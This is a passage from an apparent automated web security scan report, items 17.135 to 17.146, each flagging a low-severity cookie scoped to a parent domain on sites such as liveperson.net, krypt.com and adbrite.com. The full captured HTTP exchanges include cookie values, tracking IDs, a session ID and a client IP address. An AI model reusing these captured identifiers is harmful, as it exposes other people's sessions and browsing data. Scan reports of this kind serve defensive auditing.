Set-Cookie: LivePersonID=-16601209214853-1303691674:-1:1303691725:-1:-1; expires=Tue, 24-Apr-2012 00:35:25 GMT; path=/hc/31254474; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 25 Apr 2011 00:35:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31351

lpConnLib.Process({"ResultSet": {"lpCallId":"756832087179-375232440419","lpCallConfirm":"","lpJS_Execute":[{"code_id": "chat-truecredit-sales-english-DTEXT", "js_code": "lpJSLib.inviteDTEXT = '<p><spa
...[SNIP]...

17.135. http://sales.liveperson.net/hc/71003277/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagStartPage&lpCallId=565276490757-576158150099&protV=20&lpjson=1&page=http%3A//www.hotelclub.com/ManageBooking.asp&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-hotelclub-chat-en&activePlugin=none&cobrowse=true&PV%21unit=hotelclub-chat&PV%21visitorActive=1&SV%21language=en&title=View/Cancel%20Your%20Booking&referrer=http%3A//www.hotelclub.com/&cookie=HTC%3DAppVer%3D1%252E0%3B%20anon%3D1129876971252011042422094%3B%20ASPSESSIONIDCCQRQCTQ%3DFDCOCPBANKNGOIFKLDNNOFAM%3B%20s_vi%3D%5BCS%5Dv1%7C26DA09858516231B-400001A4A00530FD%5BCE%5D%3B%20WT_FPC%3Did%3D173.193.214.243-2165807168.30147192%3Alv%3D1303643486711%3Ass%3D1303643390479%3B%20s_cc%3Dtrue%3B%20s_lp%3Dno%3B%20s_sq%3D%255B%255BB%255D%255D HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5427601522506632860; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:11:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277
Set-Cookie: LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; expires=Mon, 23-Apr-2012 12:11:31 GMT; path=/hc/71003277; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:11:31 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"565276490757-576158150099","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

17.136. https://secure.krypt.com/active/cart/cart-image.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /active/cart/cart-image.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/cart/cart-image.html HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:19 GMT; path=/; domain=.krypt.com
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 1051
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR...............'n....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

17.137. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/?customize HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 16:39:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:39:24 GMT; path=/; domain=.krypt.com
Location: /order/customize.html?index=2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 20084


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - View Ca
...[SNIP]...

17.138. https://secure.krypt.com/checkout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /checkout/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/ HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:18 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32356


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Complet
...[SNIP]...

17.139. https://secure.krypt.com/order/customize.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /order/customize.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /order/customize.html?index=1 HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:28 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48123

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Customiz
...[SNIP]...

17.140. https://security.live.com/LoginStage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 25919
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=ucdfqwzg0orvw3jxqhywn2mz; path=/; HttpOnly
Set-Cookie: xid=b79f02fa-b994-43d5-a76d-1fdbf35adae9&&BAYxxxxxxx1D05&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=930347861&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sun, 24-Apr-2011 15:16:18 GMT; path=/
Set-Cookie: wlv=A|_-d:s*stM6Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:tuRFqrfQzYg=:2A86sT3CApx4bD1TSQD2FQiQePyCL8+HQuLs/qy4iBg=:F; domain=.live.com; path=/
PPServer: PPV: 30 H: BAYIDSTOOL1D05 V: 0
Date: Sun, 24 Apr 2011 16:56:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

17.141. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=50185&partnerID=134&clientID=5061&key=segment&pb=0 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MRT/iview/306995535/direct;;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuE42M3IxcLR9J8JSB46AiKb/zMBAEXnBjU="

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:58:33 GMT
Set-Cookie: segments_p1="eJzjYuE42M3IxcLR2cEMJJv+MwHJQ0dAZPN/JgBmUQdf";Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 23-Apr-2012 15:58:33 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)

GIF89a.............!.......,...........D..;

17.142. http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smetrics.freecreditreport.com
Path:   /b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850?AQB=1&ndh=1&t=24%2F3%2F2011%2014%3A44%3A52%200%20300&ns=experianinteractive&pageName=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&g=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&ch=100323&server=expiglobal%2Cexpifcslive&v0=671212&events=event1&c1=0&v1=0&c2=932&v2=932&c3=homepage21&v3=homepage21&c5=Prospect&v5=Prospect&c7=dfa29d439e60422e86d8462241524cd1&v7=dfa29d439e60422e86d8462241524cd1&c13=12%3A30PM&v13=12%3A30PM&c14=Sunday&v14=Sunday&c18=First%20Visit&v18=First%20Visit&c21=Paid%20Non-Search&v21=Paid%20Non-Search&c25=671212%3A0&v25=671212%3A0&c26=671212&v26=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&v29=1303674291453-51326.17&v38=932&v39=Paid%20Non-Search&v40=671212&c49=v%2012-16-2010&c50=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&AQE=1 HTTP/1.1
Host: smetrics.freecreditreport.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 19:56:01 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA4028851D2234-400001270009D366[CE]; Expires=Fri, 22 Apr 2016 19:56:01 GMT; Domain=.freecreditreport.com; Path=/
Location: http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850?AQB=1&pccr=true&vidn=26DA4028851D2234-400001270009D366&&ndh=1&t=24%2F3%2F2011%2014%3A44%3A52%200%20300&ns=experianinteractive&pageName=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&g=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&ch=100323&server=expiglobal%2Cexpifcslive&v0=671212&events=event1&c1=0&v1=0&c2=932&v2=932&c3=homepage21&v3=homepage21&c5=Prospect&v5=Prospect&c7=dfa29d439e60422e86d8462241524cd1&v7=dfa29d439e60422e86d8462241524cd1&c13=12%3A30PM&v13=12%3A30PM&c14=Sunday&v14=Sunday&c18=First%20Visit&v18=First%20Visit&c21=Paid%20Non-Search&v21=Paid%20Non-Search&c25=671212%3A0&v25=671212%3A0&c26=671212&v26=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&v29=1303674291453-51326.17&v38=932&v39=Paid%20Non-Search&v40=671212&c49=v%2012-16-2010&c50=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:56:01 GMT
Last-Modified: Mon, 25 Apr 2011 19:56:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www256
Content-Length: 0
Content-Type: text/plain


17.143. http://srv.amadesa.com/Interaction2/app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.amadesa.com
Path:   /Interaction2/app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Interaction2/app?proto=0&pid=534&ck=&us=0&en=http%3A//www.myfico.com/Default.aspx&rp=&ppid=6528&slot=amTop&res=r1920x1200&gmt=-5&jsp=RepeatPurchaser%3DFalse&cat=SG9tZXBhZ2U%3D&uid=&rd=8412905228325 HTTP/1.1
Host: srv.amadesa.com
Proxy-Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 01:06:33 GMT
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
P3P: policyref="http://srv.amadesa.com/w3c/p3p.xml" ,CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Cache-Control: max-age=300
Expires: Mon, 25 Apr 2011 01:11:33 GMT
Set-Cookie: amck="8d64ef5ed04973f8dabdaee393ab66f9,1742196*534*05,1,Gd|zg|zj|zd|Jt|zK|JQ|Cj|IV,1,7jdW,6,8C@@c_Homepage]g8,7jds|14x,1,1}@|||@*"; Version=1; Domain=.amadesa.com; Max-Age=157680000; Expires=Sat, 23-Apr-2016 01:06:33 GMT
Content-Length: 1222

if(AmManager.timeOutCall){clearTimeout(AmManager.timeOutCall);}
var amServerTime = {year:2011,month:4,day:24,hour:20,minute:6,second:33,millisecond:413};
AmResponse.set('slotName','amTop');
AmResponse
...[SNIP]...

17.144. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=764562517870.2175?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; srh="1%3Aq64FAA%3D%3D"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLsq0MrIqK6hQqgUA"; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZFtFlK668asQYmeZlJyrSil2cmpVmmCwRKYo%2Bz%2FwRgf"; vsd=0@2@4db48be1@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 24-Jul-2011 00:56:55 GMT
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:55 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLS8wLc7KqzFNLbEyLLRISy2zMrayNEgvyVaqBQA%3D"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:55 GMT
Set-Cookie: vsd=0@1@4db4c6d7@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 00:56:55 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 25 Apr 2011 00:56:55 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.145. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:37 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSozqDFNLbEyLLQwLkyxMrQyUKoFAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:37 GMT
Set-Cookie: vsd=0@1@4db48bb5@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.146. http://switch.atdmt.com/action/msnus_experian_homepage_091807  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /action/msnus_experian_homepage_091807

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/msnus_experian_homepage_091807 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: switch.atdmt.com

Response

